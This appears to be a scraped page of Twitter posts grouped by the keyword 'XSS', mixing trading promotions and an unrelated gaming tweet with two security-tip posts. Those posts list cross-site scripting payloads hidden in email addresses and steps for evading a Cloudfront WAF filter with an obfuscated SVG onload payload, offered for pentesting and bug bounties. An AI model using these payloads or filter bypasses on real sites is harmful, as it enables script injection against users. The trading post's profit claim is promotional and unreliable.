MIAX Exchange Group(@MIAXexchange) 's Twitter Profile Photo

Faster. Sleeker. More intuitive. See how our website can support your information needs for trading across our exchanges.

account_circle
Md Ismail Šojal(@0x0SojalSec) 's Twitter Profile Photo

E-mail address payloads📓

The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.

1/.XSS (Cross-Site Scripting):

test+(<script>alert(0)</script>)example.com testexample(<script>alert(0)</script>).com '

account_circle
Spartan(@SpartanTrading) 's Twitter Profile Photo

Very rare but awesome to see! One of our members taking a 1.5k past 6 figures in a little over a month in the room! $SPX $TSLA $ABNB

spartantrading.com

Very rare but awesome to see!  One of our members taking a 1.5k past 6 figures in a little over a month in the room! $SPX $TSLA $ABNB

spartantrading.com
account_circle
TAQ213(@TaQ213) 's Twitter Profile Photo

数字でしか見てないからわかんないだろうね
PS4proからXSSに変えたけど、同じゲームやっても圧倒的にXSSのが優れてるよ。

account_circle
Anton(@therceman) 's Twitter Profile Photo

Bug Bounty Hint

Bypassing Cloudfront XSS WAF

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:
🔹< = %3c
🔹> = %3e
🔹' = %22
🔹[ = %5b
🔹] = %5d
🔹` = %60

Not Encoded Payload:
<svg/onload=window['al'+'ert']`1337`>

Cheers

account_circle
Anton(@therceman) 's Twitter Profile Photo

Found a way how to use strong & smart WAF filter against itself and bypass XSS filter 😄

I will publish this trick in few days 😀

account_circle